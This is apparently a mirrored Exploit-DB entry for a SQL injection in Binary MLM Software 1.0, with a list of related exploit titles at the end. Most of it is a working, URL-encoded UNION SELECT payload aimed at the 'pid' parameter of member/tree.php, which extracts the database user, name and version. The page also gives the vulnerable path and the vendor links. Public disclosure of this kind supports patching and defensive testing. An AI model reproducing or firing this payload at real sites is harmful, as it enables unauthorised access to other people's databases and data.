Binary MLM Software 1.0 – ‘pid’ SQL Injection

Exploit Database
16 阅读

作者： Ihsan Sencan

日期： 2018-10-01
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/45512/

# Exploit Title: Binary MLM Software 1.0 - 'pid' SQL Injection
# Dork: N/A
# Date: 2018-10-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://mlmsoftwarez.in/
# Software Link: http://mlmdemo.biz/binary/root.html
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# http://localhost/[PATH]/member/tree.php?pid=[SQL]

%2d%74%65%73%74%35%27%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29%2c%28%34%29%2c%28%35%29%2c%28%36%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%2c%28%31%34%29%2c%28%31%35%29%29%2d%2d%20%2d

last Exploits
Binary MLM Software 1.0 – ‘pid’ SQL Injection的更多信息

Joomla! Component com_kp – ‘Controller’ Local File Inclusion：
Simple Issue Tracker System 1.0 – SQLi Authentication Bypass：
ProjectSend r582 – Multiple Cross-Site Scripting Vulnerabilities：
Contec Smart Home 4.15 – Unauthorized Password Reset：
Reprise Software RLM v14.2BL4 – Cross-Site Scripting (XSS)：
Online Book Store 1.0 – Unauthenticated Remote Code Execution：
Academic Timetable Final Build 7.0 – Information Disclosure：
Pligg CMS 1.1.3 – Multiple Vulnerabilities：